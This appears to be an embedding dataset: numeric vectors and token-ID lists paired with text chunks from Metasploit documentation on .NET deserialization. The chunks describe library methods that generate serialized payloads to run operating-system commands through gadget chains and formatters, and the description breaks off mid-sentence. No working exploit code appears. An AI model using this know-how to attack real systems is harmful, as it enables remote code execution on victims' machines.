0.18331071734428406, -0.6441048383712769, -0.2265111654996872, -0.4721674919128418, -0.1770300716161728, -0.26127034425735474, 1.3721857070922852, 0.49818873405456543, 0.0997161716222763, 0.4988182783126831, -0.2947939932346344, -0.2699688673019409, -0.18073534965515137, 0.0006047567585483193, 0.20348715782165527, 0.30173468589782715, -0.6813237071037292, -0.5433008670806885, 0.12427608668804169, -0.8831827640533447, 0.13197831809520721, -0.20834915339946747, 0.5516346096992493, -0.07638521492481232, -0.608153223991394, 0.8498205542564392, 0.7453439831733704, 0.01470160111784935, 0.007953821681439877, 0.6372351050376892, 0.18033987283706665, 0.16456210613250732, 0.4230187237262726, -0.3313768804073334, -0.39282888174057007, 0.3172820210456848, 0.38345351815223694, 0.0025280630216002464, 0.18921083211898804, -0.38752415776252747, 0.2961336076259613, -0.5190454125404358, 0.02445915900170803, 0.21766622364521027, 0.3333643674850464, 0.0752711296081543, -0.3381595313549042, 0.5240921378135681, -0.5905380249023438, -0.6177564859390259, -0.16726075112819672, -0.7618400454521179, -0.49321773648262024, -0.9354038238525391, -0.3792581260204315, 0.0776529312133789, -1.3108628988265991, -0.06375229358673096, 0.2610218822956085, -0.2825811207294464, -0.216194286942482, -0.28102976083755493, 0.16448377072811127, 0.2593827247619629, 0.4797625243663788, 0.3281354010105133, 0.19387023150920868, -1.2696712017059326, -0.027664804831147194, -0.28587543964385986, 0.6155990958213806, -0.5209745168685913, -1.513965129852295, 0.24105247855186462, 0.9773433804512024, -0.38433897495269775, 0.16127070784568787, -0.19312067329883575, -0.49271464347839355, 0.45906901359558105, 0.5809109807014465, -0.5535125136375427, 0.2951280176639557, -0.5258244872093201, 0.29197895526885986, -0.46974506974220276, 0.6395025849342346, -0.016623949632048607, -0.030030881986021996, -0.5031275153160095, 0.5239219665527344, -0.18757948279380798, 1.0004339218139648, 0.6331775188446045, -0.4077194035053253, 0.905920147895813, 0.6838353872299194, 0.61159348487854, 0.590739905834198, -0.6151716113090515, 0.22998803853988647, 0.6115301251411438, 0.7075033187866211, 0.862063467502594, -0.48048415780067444, 0.8012583255767822, -0.11077862977981567, -0.3295235335826874, -0.395486056804657, 0.3326912224292755, -0.25945937633514404, 0.4429679214954376, 0.10362425446510315, 0.31387123465538025, -0.1357775181531906, 0.37333232164382935, -0.0667581856250763, -0.033154744654893875, -0.26142236590385437, -0.18829591572284698, -0.7022719979286194, -0.4435618221759796, 0.6498252749443054, -0.38657477498054504, -0.1716661900281906, 0.5868808031082153, -0.49161750078201294, 1.0220320224761963, 1.2178926467895508, -0.9133986830711365, -0.2585977017879486, 0.869879961013794, 0.5470853447914124, -0.04602543264627457, -0.14294466376304626, 0.07488620281219482, 0.20673899352550507, -0.03845146298408508, -0.13516558706760406, -0.031565576791763306, 0.45107728242874146, -0.44126904010772705, -0.021922755986452103, -0.8785607814788818, -0.2672949731349945, -0.41222885251045227, -0.6312030553817749, -0.2590889632701874, 0.02867281250655651, 0.11859724670648575, -0.34032735228538513, 0.6487084031105042, -0.036441002041101456, -0.004973463248461485, 0.7052559852600098, -0.18377548456192017, 0.1051035225391388, 0.6220549941062927, 0.11338336020708084, 0.2077670842409134, 0.07528288662433624, 1.4748506546020508, 0.1456899642944336, 1.1148008108139038, 0.2674746513366699, -0.4325804114341736, 0.5796750783920288, -0.2757084369659424, -0.9746774435043335, -0.4784144163131714, 0.42571184039115906, -0.2772272825241089, 0.045369021594524384, -0.12330082803964615, -0.5698687434196472, 0.2809549868106842, -0.09408772736787796, 0.2407231628894806, -0.6939616799354553, 0.7214914560317993, -0.44643735885620117, -0.7120219469070435, -0.0017850168514996767, 0.8684027791023254, 0.11538997292518616, 0.7369288206100464, -0.6481019258499146, -0.5310893654823303, -1.0112119913101196, 0.1999838948249817, -0.626252293586731, -0.09135759621858597, -0.5455908179283142, -0.03653324022889137, -0.48474234342575073, -0.3102726936340332, -0.3577939569950104, -0.27166205644607544, -0.008650328032672405, 0.2687484920024872, 0.4349921941757202, 0.3418651223182678, 0.44182446599006653, 0.48771992325782776, -0.1324065625667572, -0.0029117176309227943, 0.2346368134021759, 0.5352877974510193, -0.9430580139160156, 1.0533215999603271, 0.619683027267456, 0.808670699596405, 0.3288014531135559, -0.2440156489610672, 0.22300802171230316, -0.42736613750457764, -0.04588651284575462, -0.7111510038375854, 0.14119668304920197, -0.37243813276290894, -1.0719826221466064, 0.022067459300160408, 1.0827594995498657, -0.14802640676498413, -0.07515215128660202, -0.6576401591300964, -0.768809974193573, -0.4787631332874298, -0.36143115162849426, -0.547623336315155, -0.072236068546772, -0.07931589335203171, -0.8505568504333496, 0.1738465428352356, -0.9808900952339172, 4.05422306060791, 1.0200668573379517, 0.6883766055107117, 0.5682522654533386, 0.004984639585018158, 1.0365992784500122, 0.10499262064695358, -0.12357694655656815, 0.04631813243031502, -0.23174060881137848, 0.6174044609069824, -0.06029600277543068, 0.6152737140655518, 0.12105993926525116, -0.0375029519200325, 1.0539741516113281, -0.8080677390098572, -0.1709955781698227, 0.34501129388809204, -0.77606600522995, -0.4008239209651947, 0.000029970180548843928, -0.16693347692489624, 0.276390016078949, 0.015349832363426685, 0.14202868938446045, 0.16230027377605438, -0.05596020072698593, -0.3263450860977173, -0.4594631791114807, 0.06095615774393082, -0.5183896422386169, 0.6416722536087036, -0.27117785811424255, -0.8300600051879883, 0.7702144980430603, 0.13182593882083893, -0.24759483337402344, -0.2006501853466034, 0.1567203402519226, 0.12922027707099915, -0.37181031703948975, -0.7695960998535156, 0.16716314852237701, -0.5012838840484619, 1.085922122001648, -0.36995744705200195, 0.35958239436149597, 0.49985262751579285, 0.11522608995437622, -0.01760992594063282, -0.23528563976287842, 0.15995214879512787, -0.4748294949531555, -0.36226335167884827, -0.28462544083595276, -0.23690631985664368, 0.4693402647972107, 0.06272801756858826, 0.1903155893087387, -0.05090909078717232, 0.392190545797348, -0.21541734039783478, 0.1978643834590912, -0.2439277023077011, 0.09480185806751251, -0.5898643732070923, 1.0049771070480347, -0.7749680876731873, 0.028720006346702576, -0.513053297996521, -0.42648547887802124, -0.08618950098752975, -0.09173021465539932, 0.059631939977407455, -0.21396014094352722, -0.15666213631629944, -0.15046869218349457, 0.8323705196380615, -0.29443565011024475, -0.1561278998851776, 0.05744049325585365, -0.38285329937934875, -0.5790325403213501, -0.013967268168926239, 0.7467515468597412, -0.1258660852909088, -0.022643981501460075, -0.3662763237953186, 0.20870737731456757, 0.5611293911933899, 0.5583468079566956, -0.4381779730319977, 0.3857581615447998, -0.24123317003250122 ]
[ 101, 2129, 2000, 1060, 2953, 2007, 18804, 13102, 4135, 4183, 1024, 1024, 7705, 1024, 1024, 21624, 10760, 18804, 13102, 4135, 4183, 1039, 21624, 2038, 2328, 1011, 1999, 2490, 2005, 1060, 2953, 17181, 1998, 21933, 4667, 1010, 2029, 2003, 7528, 2004, 1996, 1060, 2953, 1012, 1044, 20346, 1012, 3642, 2742, 1001, 2421, 1026, 3645, 1012, 1044, 1028, 1001, 2421, 1026, 5164, 1012, 1044, 1028, 1001, 2421, 1026, 1060, 2953, 1012, 1044, 1028, 20014, 2364, 1006, 20014, 12098, 5620, 1010, 25869, 1008, 1008, 12098, 2290, 2615, 1007, 1063, 25869, 1008, 1060, 5668, 16344, 1027, 1000, 1050, 10695, 2078, 1000, 1025, 25869, 1060, 2953, 14839, 1027, 1014, 2595, 2692, 2546, 1025, 6948, 6767, 3593, 6948, 8569, 2546, 1027, 7484, 8095, 10085, 1006, 19701, 1010, 2946, 11253, 1006, 20014, 1007, 1008, 2358, 20927, 2078, 1006, 1060, 5668, 16344, 1007, 1010, 2033, 2213, 1035, 10797, 1010, 3931, 1035, 15389, 1035, 3191, 26373, 1007, 1025, 2033, 5244, 3388, 1006, 6948, 8569, 2546, 1010, 1005, 1032, 1014, 1005, 1010, 2358, 20927, 2078, 1006, 1060, 5668, 16344, 1007, 1007, 1025, 1060, 2953, 1006, 1006, 25869, 1008, 1007, 6948, 8569, 2546, 1010, 1060, 5668, 16344, 1010, 1060, 2953, 14839, 1010, 2358, 20927, 2078, 1006, 1060, 5668, 16344, 1007, 1007, 1025, 4471, 8758, 1006, 19701, 1010, 6948, 8569, 2546, 1010, 1000, 3231, 1000, 1010, 16914, 1035, 7929, 1007, 1025, 2709, 1014, 1025, 1065, 2000, 4012, 22090, 1010, 2224, 18804, 13102, 4135, 4183, 1024, 1024, 7705, 1024, 1024, 21624, 1024, 1024, 3645, 1012, 4012, 22090, 1035, 1039, 102 ]
metasploit
130.txt
0
[CLS] table of contents dot net deserialization java deserializationback to top [SEP]
[ -0.7595808506011963, -0.9853857159614563, 0.6927202939987183, 0.07755973190069199, 0.35555368661880493, 0.13883475959300995, -0.4098203778266907, -0.4611765146255493, 0.74019455909729, 0.5789566040039062, -0.15685872733592987, -0.40451765060424805, 0.5690140128135681, 0.028869813308119774, -0.6463883519172668, -0.4492155611515045, 0.13970650732517242, 0.1868133842945099, -0.9793672561645508, 0.876187801361084, 0.22890357673168182, -0.18828235566616058, -1.0197638273239136, -0.6408880949020386, -0.3012453317642212, 0.09740611165761948, 0.4131223261356354, 0.12810809910297394, 1.7155263423919678, 1.4089691638946533, -0.016920393332839012, 0.23782207071781158, -0.13023535907268524, -0.2945370078086853, -0.07068471610546112, -0.6966336965560913, -0.34307655692100525, -0.18096697330474854, 0.029698073863983154, -0.6545016169548035, 0.12937399744987488, -0.03553289547562599, 0.5092784762382507, -1.267416000366211, -1.0582008361816406, 0.21657730638980865, 0.3358124792575836, 0.3606998026371002, -0.3116315007209778, -0.9027659893035889, -0.9435299634933472, 0.12217769026756287, -0.02905535139143467, 0.4628344774246216, -0.5114073157310486, 0.3237774968147278, -0.03909294307231903, -0.1318877637386322, -0.5338143110275269, 0.39356735348701477, 0.40760335326194763, 0.5758541822433472, 0.4069167375564575, -0.6299149990081787, 0.2830542027950287, 0.6366879940032959, -0.17835120856761932, -0.18035727739334106, 0.2563494145870209, -0.028668230399489403, -0.8642870783805847, 0.23201949894428253, -0.014327218756079674, -0.5656891465187073, -1.0466073751449585, 0.4308658838272095, -0.15730799734592438, 0.11692558974027634, 0.3701229989528656, 0.23780976235866547, -0.9471834897994995, 0.8185638785362244, 0.3467080593109131, -0.04268110543489456, -0.3300708532333374, -0.4936298131942749, 0.5887287259101868, 0.40200501680374146, 0.461262047290802, 0.4214782416820526, -1.0336227416992188, 0.9959275722503662, -0.4421366751194, 0.06985295563936234, -0.10202919691801071, 0.4580490291118622, -0.2766241133213043, 0.14659383893013, -0.19603611528873444, -0.15824346244335175, 0.45281481742858887, 0.722109854221344, 0.04302151873707771, 0.3084619343280792, -0.5286048650741577, 0.22676728665828705, 0.4273495078086853, -0.0462057888507843, -0.3113365173339844, -0.3475385308265686, -0.19633685052394867, -0.2731507420539856, -0.09780912101268768, -0.5882601737976074, -0.5303940176963806, 0.5526773929595947, 0.08182322978973389, -0.04286182299256325, 0.22039112448692322, -0.0931718498468399, 1.0203731060028076, -0.8625986576080322, 0.7747413516044617, -0.6351193189620972, 0.05273451656103134, -0.4829005002975464, -0.19619210064411163, 0.22704924643039703, -0.6824542880058289, -0.10559286177158356, -0.21173560619354248, -0.48736730217933655, 0.4898880124092102, 0.5425574779510498, -0.36574873328208923, -0.434181809425354, -0.25545376539230347, -0.5442814826965332, -0.1061159297823906, -0.6799120306968689, 0.20979486405849457, -0.4789543151855469, -0.01891297660768032, 1.1715956926345825, -0.38262781500816345, 0.4697020649909973, -0.47455325722694397, 0.24204477667808533, -1.31425142288208, -0.10140211135149002, -0.6646556854248047, -0.12974821031093597, 0.9815707802772522, 0.5149911046028137, -0.28719204664230347, -0.2550533413887024, -0.10744539648294449, -0.1852075457572937, 0.282436728477478, -0.4423501491546631, -0.08140991628170013, -0.017793802544474602, -1.1609402894973755, 0.8655939102172852, -0.3619346618652344, 1.0150119066238403, 0.07537134736776352, -1.1074185371398926, -0.14295177161693573, -0.28837481141090393, 0.0239246916025877, 0.28276577591896057, -0.761873185634613, 0.7034609317779541, 0.37059032917022705, 0.7903856039047241, -0.02877306379377842, -0.20903033018112183, 0.433942586183548, 0.6990760564804077, -0.19518987834453583, 0.1460578739643097, -0.02791675366461277, 0.5152903199195862, -0.2820581793785095, -0.07365661859512329, 1.2113196849822998, -0.5138036012649536, -0.06673742830753326, 0.12346392124891281, 0.17499877512454987, 0.5970996618270874, -0.2340693324804306, 0.38732782006263733, -1.1318740844726562, 0.01576930470764637, -1.3217023611068726, 0.9156386852264404, -0.5445354580879211, -0.11550766229629517, -0.8659704327583313, 0.4503788650035858, -0.8495218753814697, 0.31516823172569275, -0.36108070611953735, -0.783184826374054, 1.611365556716919, 0.3434377610683441, -0.22843331098556519, -0.1999412477016449, 0.09631361812353134, -0.05010918155312538, -0.8024667501449585, 0.20882491767406464, -0.10428249835968018, -0.29983335733413696, -0.14756286144256592, 0.6035141348838806, -0.26381105184555054, 0.39364972710609436, -0.030446138232946396, 1.0809680223464966, 0.4115171432495117, 0.2953084111213684, -0.4306188225746155, 0.5501885414123535, 0.43497368693351746, 0.1614442765712738, 0.30874478816986084, 0.04362514615058899, 0.2909783720970154, 0.17260859906673431, 0.09122947603464127, 0.8600252270698547, 0.2698260247707367, 0.2711738049983978, 0.7024706602096558, 0.12860548496246338, -0.08216388523578644, -0.3346540331840515, -0.41406089067459106, -0.013935752213001251, 0.19844971597194672, -0.007135277148336172, -0.571326732635498, -0.13572491705417633, 0.05816302075982094, 0.07666682451963425, -0.6377413868904114, 0.818970263004303, -0.3378237783908844, 0.4757992625236511, 0.3666281998157501, 0.07847649604082108, -0.22445148229599, -0.9596832394599915, 0.36844107508659363, 0.6678300499916077, -1.1155661344528198, -0.8922771215438843, 0.681788444519043, 0.8006144762039185, -0.3052906095981598, -0.9191421866416931, 0.2764543890953064, 0.09733447432518005, -0.029501190409064293, -0.4498167932033539, 0.36285531520843506, -1.980997085571289, -0.3240412473678589, -0.6795264482498169, -0.5738550424575806, 0.7282616496086121, -1.05170738697052, -0.5667909979820251, 0.9747074246406555, -0.9185411930084229, 0.06495322287082672, 0.07271876186132431, 0.04229680448770523, -0.09496845304965973, 0.4532281458377838, 0.8042461276054382, 0.8216399550437927, -0.19869519770145416, 0.11205627024173737, 0.05726080760359764, -0.32148972153663635, 0.22536800801753998, -0.8433070182800293, -0.016311852261424065, -0.07258664071559906, 0.15358570218086243, -0.47205448150634766, 0.5264720916748047, 0.4709630012512207, -0.3691629469394684, -0.4754824936389923, -0.49303945899009705, -0.9252318143844604, -0.8876236081123352, -0.6884754300117493, -0.4596174359321594, -0.9665825963020325, 0.6197578310966492, 0.36135849356651306, -0.13099299371242523, 0.9507796764373779, 0.6527016758918762, 0.7076764702796936, 0.3858788311481476, 0.30966493487358093, -0.04387553781270981, -0.6569536328315735, 0.826918363571167, 0.1982010006904602, 0.052665792405605316, 0.3375222086906433, -0.4402625560760498, -1.3342413902282715, 0.48690593242645264, -0.07129709422588348, -0.6903148889541626, 0.12170325964689255, 1.1276450157165527, -0.4617334008216858, -0.9754701852798462, 0.6284645199775696, -0.3510892391204834, -0.745697021484375, -0.11152078211307526, -0.1322326511144638, 0.668503999710083, 0.9168608784675598, 1.0260854959487915, -0.7788408398628235, -0.5444804430007935, 0.13938646018505096, 0.39505812525749207, -0.03989853337407112, -0.3960011601448059, 0.6167037487030029, 0.2122879922389984, 0.20608314871788025, -0.6569268107414246, 0.12480413168668747, -0.024260263890028, 0.009946197271347046, 0.3499164581298828, -0.7064692378044128, 0.3180380165576935, 0.18463730812072754, 0.2049030363559723, 0.9144649505615234, 0.5060268044471741, -0.23338854312896729, -0.0475509949028492, 0.2697311341762543, 0.1067020446062088, 0.9796000719070435, 0.07322958111763, -0.523307740688324, -0.3124470114707947, -0.7401764392852783, -1.374761700630188, 0.5875369906425476, 0.35333818197250366, 0.542068600654602, -0.565625786781311, 0.5753346681594849, 0.7557147741317749, 0.38926634192466736, 0.7809509038925171, -0.5638960599899292, -0.9035720229148865, 0.5527569055557251, -0.22091889381408691, 1.2127660512924194, -0.5334364771842957, -0.34049639105796814, -0.7308734059333801, 0.3793526291847229, 0.40099814534187317, 0.3606322109699249, -0.06887868791818619, 0.013919686898589134, 0.05985793098807335, -0.48760226368904114, -0.3357289135456085, 0.3765304386615753, -0.22017896175384521, 0.3708241879940033, 0.4130350351333618, -0.803738534450531, -0.5309560894966125, 0.33146384358406067, 0.6759178042411804, 0.21865668892860413, 0.19601953029632568, 0.5261754989624023, -0.39763516187667847, -0.04529956355690956, 0.888197660446167, -0.3005424737930298, -0.14904910326004028, 0.04493999481201172, 0.6549081802368164, 0.23534195125102997, 0.3165636658668518, -0.22683821618556976, -0.3407122790813446, -0.046086810529232025, 0.8194438219070435, -0.2023361772298813, 0.5184918642044067, -0.5920891165733337, 0.024833794683218002, 1.0244265794754028, 0.7300240993499756, 0.46749407052993774, -0.6451447606086731, 0.1201983094215393, -0.07561536133289337, 0.8517622351646423, -0.36900386214256287, -0.014851728454232216, 0.08192168176174164, -0.2687251567840576, 0.7347514629364014, -0.26356229186058044, -1.3990375995635986, -0.43268975615501404, -0.6444143652915955, -1.0901429653167725, 1.4974260330200195, 1.0909745693206787, -0.27755627036094666, 0.6991668343544006, -0.056006018072366714, -0.12429925799369812, 0.37904807925224304, -0.44817301630973816, -0.1810280978679657, 0.1941443681716919, -0.5332570672035217, 0.015738753601908684, 0.5341735482215881, 0.12328766286373138, 0.12606684863567352, 0.28334590792655945, -0.5380557179450989, 0.48796412348747253, -1.2045034170150757, 0.2903597056865692, -0.2988494336605072, -0.28596580028533936, 0.23691816627979279, 0.3861192762851715, -0.5866681933403015, -0.010037600062787533, 0.23697027564048767, 0.6163604259490967, 0.5903795957565308, -0.636496365070343, 0.896121084690094, -0.15457768738269806, 0.21845245361328125, 0.47495219111442566, 0.5564461946487427, -0.4697243571281433, -0.22429609298706055, -0.02096998691558838, -0.4596939980983734, 0.4875328242778778, -0.1213199719786644, 0.32599446177482605, -1.1190012693405151, -0.4534340798854828, 0.24490250647068024, -0.33062177896499634, 1.4537938833236694, 0.33148279786109924, -1.1557482481002808, 0.5765097737312317, -0.6139654517173767, -0.49444007873535156, 0.3610399663448334, -0.22459854185581207, 0.049809567630290985, -0.3550606667995453, -0.6236617565155029, 0.6277840733528137, -0.6873703002929688, 0.5396080613136292, -0.5223144888877869, 0.21114635467529297, -0.2659459114074707, 0.1245507225394249, 0.5635247826576233, 1.185710072517395, -0.008834960870444775, -1.5828378200531006, -0.18851466476917267, 0.29637208580970764, -0.4573552906513214, -1.123359203338623, 0.1826203465461731, -0.035337451845407486, 0.1580551117658615, 0.12368601560592651, 0.11310478299856186, -0.3504320979118347, -0.5944745540618896, 0.2950576841831207, 0.44913455843925476, 0.7677052021026611, 0.26013490557670593, 0.3289070725440979, -0.21774044632911682, 0.8291453123092651, -0.33711954951286316, 0.3778597116470337, 0.18057364225387573, -0.40687406063079834, -0.09480782598257065, -0.014567684382200241, -0.5443884134292603, -0.07410255074501038, -0.6718118190765381, 0.31688305735588074, -0.13562096655368805, -0.5633608102798462, -0.5002759695053101, 0.18911390006542206, 0.18467527627944946, 0.5430910587310791, 0.00914683099836111, -0.5532596707344055, 0.1392742544412613, -0.22982841730117798, 0.622389554977417, -0.6062048077583313, 0.08766505122184753, -0.07261481136083603, -0.3552185595035553, -0.2828359305858612, 1.1839460134506226, 0.029903339222073555, 0.604255199432373, 0.22054094076156616, -0.27153605222702026, 0.16891878843307495, 0.31049272418022156, -1.2805851697921753, 0.012823210097849369, 0.7364020943641663, -0.24917492270469666, 0.20630010962486267, 0.0367429293692112, -0.39630067348480225, 0.26771384477615356, -0.7441407442092896, 0.22912512719631195, 0.12172982841730118, 0.12844020128250122, -0.07962169498205185, 0.6050953269004822, 0.4368617534637451, -0.5251490473747253, 0.5979230403900146, -0.7051381468772888, 0.8268043994903564, -0.8305841684341431, 0.18745267391204834, -0.32474860548973083, -0.7164097428321838, -1.1781253814697266, -0.4106532633304596, 0.31624361872673035, -0.619806170463562, 0.06994587928056717, 0.7865837216377258, -0.23888781666755676, 0.954135537147522, -1.0735793113708496, 0.9759021997451782, 0.7904143929481506, 0.0550188347697258, -0.630486786365509, -1.1246917247772217, -0.03027966618537903, -0.10071657598018646, -0.6141130328178406, -0.27430298924446106, -0.25472569465637207, -0.5716171860694885, 0.2112758755683899, -0.3243759274482727, -0.592939555644989, -1.3072681427001953, -0.0994461253285408, 0.8609527945518494, 0.1660727858543396, 0.8400619029998779, 0.8805368542671204, -0.43125462532043457, -0.568172812461853, 0.25026771426200867, -0.251767098903656, -0.280035138130188, 0.512447714805603, -0.07788728177547455, 0.01641855016350746, -0.003592611523345113, -0.6370264291763306, -0.060481056571006775, -0.17414577305316925, 1.1678886413574219, 0.4581218957901001, -0.7595558762550354, 0.930046796798706, 0.9322303533554077, -0.550912082195282, -0.3393940031528473, -1.1326981782913208, -0.19678470492362976, -0.3065696060657501, -0.7601040005683899, -1.0367447137832642, 0.6487016081809998, 0.4681268632411957, -0.18613669276237488, 0.2624398469924927, -0.12334636598825455, -0.2769767642021179, -0.257580041885376, -0.017900120466947556, -0.46504446864128113, 0.18333783745765686, 0.4244139790534973, -0.19644494354724884, 0.6269049048423767, -0.6630186438560486, -0.5292929410934448, -0.7862492203712463, 0.3566725552082062, 1.2585272789001465, 0.13772939145565033, 0.3840794563293457, -0.4691471457481384, 0.4253365099430084, 1.0638203620910645, -0.2603643834590912, 0.1260376274585724, 0.45746931433677673, -0.6081554293632507, -1.1088052988052368, -0.31782132387161255, 0.043461572378873825, 0.18580558896064758, 0.4291127622127533, -0.3584514558315277, 0.46490833163261414, 0.6757513880729675, -0.030743638053536415, 0.02199576236307621, -1.693151831626892, 0.4033839702606201, -0.09152892231941223, 0.00042256107553839684, -1.4703203439712524, -0.7904399633407593, -0.17174217104911804, -0.12748965620994568, -0.21549126505851746, -0.5644849538803101, -0.5310484766960144, 0.3559890687465668, 0.8884584307670593, -0.2774795889854431, 0.5906273126602173, -0.04889990761876106, -0.9133830666542053, -1.0927995443344116, -0.5365357398986816, -0.06828609108924866, 0.22570696473121643, 0.3506782650947571, -0.120638906955719, -0.3079524636268616, -0.5306037664413452, 1.0244494676589966, 0.2670873999595642, 0.3835725784301758, -0.41324788331985474, 0.05274801328778267, 0.2883254885673523, -0.3780031204223633, -0.1188657283782959, 0.8541393876075745, 0.7768599987030029, -0.49072355031967163, -0.3101194202899933, 0.014660048298537731, -0.46415114402770996, -0.44675034284591675, 0.6669836640357971, 0.383877158164978, 0.2555048167705536, 0.40473899245262146, -0.13533751666545868, -0.1144920065999031, -0.33937540650367737, -0.08919627219438553, -0.08951638638973236, 0.027594545856118202, 0.7297844290733337, 0.06240110471844673, 0.8021172285079956, 1.0911675691604614, -0.07747651636600494, 0.5130387544631958, -0.46698203682899475, 0.29492610692977905, 0.9055508971214294, 0.34449541568756104, -0.5937930941581726, -0.014574775472283363, 0.22593343257904053, -0.08111697435379028, 0.1984032392501831, -0.02988937869668007, 0.04541648551821709, 0.6009121537208557, -0.5686650276184082, 0.03950641676783562, -0.18894442915916443, 0.4772473871707916, 0.20517852902412415, 0.38562828302383423, 0.11881982535123825, -0.4768757224082947, -0.17702843248844147, -0.08167704194784164, -0.02170695923268795, 0.06506489217281342, 0.06894025951623917, -0.7464767098426819, 0.32736480236053467, -0.41648879647254944, -0.3503093421459198, -1.078681230545044, -0.7172276377677917, 0.21736209094524384, 0.05287322774529457, -0.20325729250907898, -0.4267239570617676, 0.962213933467865, 0.7116910815238953, 0.5664609670639038, -0.12276583164930344, 0.37066930532455444, -0.42905327677726746, 0.28602275252342224, -0.4285581707954407, -1.0644934177398682, 0.16502973437309265, 0.1315893828868866, 0.31101685762405396, 0.5625655651092529, -0.2053738385438919, 0.2551576495170593, 0.1480724811553955, 1.510456919670105, -0.3207959234714508, -0.32163724303245544, -0.6135905981063843, -0.2335859090089798, -0.6246490478515625, 0.4008893072605133, -0.7856650352478027, -0.30611684918403625, 0.9039857387542725, -0.8613558411598206, 0.10517867654561996, 0.8279706239700317, 0.5705927610397339, 0.14067909121513367, 0.3822075128555298, -0.13095013797283173, 0.1780620813369751, 0.12872545421123505, -0.779046893119812, 0.49725717306137085, 0.22627949714660645, 0.7329562902450562, 1.0566070079803467, -0.5308760404586792, 0.5218638777732849, -0.4728608727455139, 0.2531943917274475, -0.19514049589633942, 0.29811370372772217, 0.306262731552124, -0.1790642887353897, 0.9256067872047424, -0.3876985013484955, -0.772601842880249, -0.46757179498672485, -0.1305258870124817, -0.2797296643257141, -0.7396543025970459, -0.09869746118783951, -1.0303434133529663, -0.3803747594356537, 0.7721725702285767, -0.3269382119178772, -0.2950265407562256, -0.04618215933442116, -0.34028199315071106, 0.6653949022293091, 0.475322961807251, -0.4602104723453522, -0.10302389413118362, 0.017384573817253113, 0.18037846684455872, -0.020526060834527016, 0.45360738039016724, 0.928469181060791, 0.5229983925819397, -0.3940017521381378, 0.3059207499027252, -0.6180422306060791, 0.41931387782096863, 0.22289492189884186, -0.019409243017435074, -0.8374777436256409, 0.030030731111764908, -0.226639524102211, -0.40044280886650085, 0.48760998249053955, -0.5762249827384949, -0.8679146766662598, -0.16891734302043915, -0.6950795650482178, -0.31246238946914673, -0.11490418016910553, 0.6148443818092346, -0.13714054226875305, -0.493732750415802, 0.1223030760884285, -0.044746920466423035, 0.5060592889785767, 0.14816060662269592, 0.9894805550575256, 0.10093194991350174, 0.3779216706752777, 0.9465514421463013, -1.201705813407898, 0.2915857434272766, -0.3149448335170746, -0.27224740386009216, 0.2695693373680115, 0.003529852954670787, -0.27901849150657654, -0.28928762674331665, 0.6218312382698059, -0.5050424933433533, -0.35400450229644775, 0.4598385989665985, 0.23513373732566833, -0.6334134936332703, 0.8840890526771545, -0.03783463314175606, -0.7722201347351074, 0.32672521471977234, 2.0650558471679688, 0.8643940091133118, -0.8744644522666931, -0.5218662619590759, -0.5827283263206482, -0.23439307510852814, 0.7645434737205505, -0.7278257608413696, 0.6541295647621155, -0.4275479018688202, -0.978931188583374, 0.23233720660209656, -0.9001522660255432, -0.7129709124565125, -0.23491351306438446, 0.5421890020370483, -0.6822585463523865, 0.4981237053871155, 0.5024054050445557, 0.6675270795822144, -0.14482638239860535, -0.5698248744010925, 0.016700420528650284, 0.11900445818901062, 1.3669989109039307, 0.43725794553756714, 1.3217211961746216, 0.6937716603279114, -0.2787700295448303, 0.3262273669242859, 0.32327938079833984, 0.2720044255256653, -0.7419424653053284, -0.14363549649715424, 0.6337102651596069, -0.042577244341373444, -0.1994818150997162, -0.5174160599708557, -0.1787356436252594, 0.3054625689983368, -0.6624360680580139, -0.44604095816612244, 0.1260264366865158, 0.5077983140945435, -0.4738236963748932, -0.15419715642929077, -0.5131683349609375, -0.02606889046728611, -0.4912189543247223, 0.4186673164367676, 0.22974015772342682, -1.1752631664276123, 3.7206268310546875, 0.5595186948776245, 0.4306928515434265, 0.010573484003543854, 0.3994190990924835, 1.2801493406295776, -0.14486557245254517, 0.05892040580511093, -0.5164106488227844, -0.6451559066772461, 0.7827937006950378, -0.58879554271698, 0.39042577147483826, 0.6175521612167358, -0.31814879179000854, 0.3053757846355438, -1.0145080089569092, -0.04759599268436432, 0.45939961075782776, -1.1518704891204834, -0.8074666261672974, 0.17850525677204132, 0.048395756632089615, 1.353387475013733, 0.13741932809352875, 0.18543386459350586, 0.8105435371398926, -0.9312393069267273, -0.4882029891014099, -0.413833349943161, 0.23917116224765778, -0.02802213281393051, 1.2919719219207764, 0.10073031485080719, -0.4357309341430664, -0.6682360768318176, 0.666729748249054, -1.5309877395629883, 0.9118406176567078, -0.09544459730386734, 0.0994400680065155, -0.5692579746246338, 0.5425440073013306, -0.679434597492218, -0.08630948513746262, 0.13671554625034332, 0.021657491102814674, 0.6856107711791992, -0.06553880870342255, -0.08431707322597504, 0.7048775553703308, -0.37683039903640747, 0.743715226650238, -1.3105061054229736, -0.7910798788070679, -0.07725478708744049, -0.46646344661712646, -0.49156683683395386, 0.32323452830314636, -0.2693461775779724, 0.5339013934135437, 0.5212727189064026, -0.8185315132141113, 0.007726628333330154, -0.46198970079421997, 0.31853610277175903, 0.1613171100616455, -0.17626865208148956, 0.2439049482345581, -0.45762819051742554, 0.7488404512405396, -0.1475972682237625, -0.5564517378807068, 0.7583882212638855, 0.06465182453393936, 0.23605309426784515, -0.7441891431808472, 0.40519291162490845, 0.4016454219818115, -0.2595498561859131, -0.137379452586174, -0.36893168091773987, -0.5131841897964478, -1.1546118259429932, 0.4765165150165558, 0.4865303337574005, -0.47698527574539185, 0.027177834883332253, -0.37004026770591736, 0.521355152130127, 1.0410231351852417, 1.2655833959579468, 0.2400568127632141, 0.9570605754852295, 0.5730513334274292 ]
[ 101, 2795, 1997, 8417, 11089, 5658, 4078, 11610, 22731, 9262, 4078, 11610, 22731, 5963, 2000, 2327, 102 ]
metasploit
131.txt
0
[CLS] metasploit includes a library for leveraging. net deserialization attacks. using it within a module is very straight forward, the module author just needs to know two things : the gadget chain and the formatter. the library uses the same names for each of these values as the ysoserial. net project for compatibility, although the metasploit library only supports a subset of the functionality. support matrixthe following table outlines the supported gadget chains, formatters and the compatibility of each. gadget chain [UNK] basic usagethe library is located in msf : : util : : dotnetdeserialization and contains the following methods which are intended for use by module authors. # generate ( cmd, gadget _ chain :, formatter : ) this function will generate a serialized payload to execute the specified operating system command cmd. the command is serialized using the specified gadget _ chain and formatted with the specified formatter. the gadget _ chain and formatter options will be specific to the vulnerability that is being executed. this functions returns a string. # generate _ formatted ( stream, formatter : ) format a serializedstream object, as created by # generate _ gadget _ chain. the stream will be formatted using the specified formatter and returned as a string. # generate _ gadget _ chain ( cmd, gadget _ chain : ) create a gadget chain to run the specified operating system 